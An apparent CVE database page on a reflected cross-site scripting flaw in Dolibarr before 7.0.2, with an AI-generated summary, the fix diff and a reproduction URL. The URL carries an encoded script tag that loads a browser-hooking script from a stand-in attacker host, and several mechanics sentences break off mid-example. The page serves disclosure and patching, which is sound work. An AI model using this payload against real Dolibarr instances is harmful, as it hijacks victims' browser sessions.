CVE-2018-10095
Description
Cross-site scripting vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script via the foruserlogin parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-site scripting vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script via the foruserlogin parameter.
Vulnerability
Dolibarr versions before 7.0.2 are vulnerable to a reflected cross-site scripting (XSS) attack in the adherents/cartes/carte.php script. The foruserlogin parameter is not properly sanitized; the test_sql_and_script_inject() function used for security checks fails to block many XSS payloads, allowing arbitrary HTML and JavaScript injection [2][3].
Exploitation
An unauthenticated remote attacker can craft a malicious URL containing a JavaScript payload in the foruserlogin parameter and trick a logged-in Dolibarr user into clicking it. No special network position or authentication is required; the attack relies on user interaction (e.g., clicking the manipulated link). The injected script executes in the victim's browser within the context of the Dolibarr session [2][3].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser, leading to disclosure of sensitive information such as session cookies, credentials, or other data accessible via the Dolibarr interface. The CVSS v3.0 score is 7.4 (High) with Confidentiality impact High and Scope Changed, indicating the injected script can affect resources beyond the vulnerable component [2][4].
Mitigation
The vulnerability is fixed in Dolibarr version 7.0.2, released prior to the public disclosure. Users should upgrade to 7.0.2 or later immediately. No workarounds are documented; the only effective mitigation is applying the patch [2][3][4].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
dolibarr/dolibarrPackagist | < 7.0.2 | 7.0.2 |
Affected products
1Patches
11dc466e1fb68FIX CVE-2018-10095
1 file changed · +6 −7
htdocs/adherents/cartes/carte.php+6 −7 modified@@ -29,19 +29,18 @@ require_once DOL_DOCUMENT_ROOT.'/core/modules/member/modules_cards.php'; require_once DOL_DOCUMENT_ROOT.'/core/modules/printsheet/modules_labels.php'; -$langs->load("members"); -$langs->load("errors"); +$langs->loadLangs(array("members","errors")); // Choix de l'annee d'impression ou annee courante. $now = dol_now(); $year=dol_print_date($now,'%Y'); $month=dol_print_date($now,'%m'); $day=dol_print_date($now,'%d'); -$foruserid=GETPOST('foruserid'); -$foruserlogin=GETPOST('foruserlogin'); -$mode=GETPOST('mode'); -$model=GETPOST("model"); // Doc template to use for business cards -$modellabel=GETPOST("modellabel"); // Doc template to use for address sheet +$foruserid=GETPOST('foruserid','alphanohtml'); +$foruserlogin=GETPOST('foruserlogin','alphanohtml'); +$mode=GETPOST('mode','aZ09'); +$model=GETPOST("model",'aZ09'); // Doc template to use for business cards +$modellabel=GETPOST("modellabel",'aZ09'); // Doc template to use for address sheet $mesg=''; $adherentstatic=new Adherent($db);
Vulnerability mechanics
Root cause
"Missing input type validation on the `foruserlogin` GET parameter allows unescaped HTML/JavaScript to be reflected into the page."
Attack vector
An unauthenticated remote attacker can inject arbitrary HTML or JavaScript by sending a crafted GET request to `adherents/cartes/carte.php` with a malicious `foruserlogin` parameter [ref_id=2]. The application's existing `test_sql_and_script_inject()` filter blocks some XSS patterns (e.g. `
Affected code
The vulnerable file is `htdocs/adherents/cartes/carte.php`. The GET parameters `foruserlogin`, `foruserid`, `mode`, `model`, and `modellabel` were fetched without a type filter, allowing arbitrary input to be reflected into the HTML page output.
What the fix does
The patch adds a second argument to each `GETPOST()` call in `carte.php`, specifying a type filter such as `'alphanohtml'` or `'aZ09'` [patch_id=1703321]. The `'alphanohtml'` filter strips HTML tags and restricts characters to alphabetic and numeric values, preventing the injection of `
Preconditions
- authNo authentication required; the vulnerable page is accessible to unauthenticated users
- networkAttacker must be able to send HTTP GET requests to the Dolibarr instance
- inputThe foruserlogin parameter is reflected into the page without sanitization
Reproduction
Visit the following URL (replace the host and port with your target): `http://dolibarr.lab:2080/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print` [ref_id=2]. The decoded payload `">
Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/advisories/GHSA-p2fm-8rhj-58frghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2018-10095ghsaADVISORY
- www.openwall.com/lists/oss-security/2018/05/21/3ghsamailing-listx_refsource_MLISTWEB
- github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLogghsax_refsource_CONFIRMWEB
- github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56ghsax_refsource_CONFIRMWEB
- sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerabilityghsaWEB
- sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.